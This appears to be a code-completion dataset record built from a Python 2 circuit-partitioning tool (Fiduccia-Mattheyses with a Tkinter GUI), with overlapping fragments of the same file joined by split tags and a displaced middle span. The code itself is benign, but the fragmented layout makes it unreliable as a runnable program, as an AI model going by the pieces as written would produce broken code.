def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Run the FM partitioning process
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On the first run do the initial split placement and gain computation. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
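# Each of the 6 passes below repeatedly picks the highest-gain unlocked node whose move
# keeps the two partition sizes within 2 of each other, moves it, locks it, and updates
# gains incrementally. At the end of every pass the best configuration seen so far is
# restored and all nodes are unlocked before the next pass.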
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# Keep searching while the size difference is outside [0, 2], i.e. while moving this node would unbalance the partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
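# gainOrder is a list of (gain, node) tuples kept sorted by gain; self.keys mirrors the
# node order so incrGain can find an entry by node, remove it, and re-insert the updated
# gain with bisect.insort.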
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
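# The moving force counts neighbours and connected net sources on the opposite partition
# (weighted 3x in this implementation); the retention force counts those on the same partition.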
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
|
if __name__ == "__main__":
main(sys.argv[1:]) | random_line_split |
|
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quiet Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Run the FM partitioning process
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On the first run do the initial split placement and gain computation. This allows pausing and continuing the process
if (self.firstRun == True):
|
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# Keep searching while the size difference is outside [0, 2], i.e. while moving this node would unbalance the partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
| self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost() | conditional_block |
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quiet Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
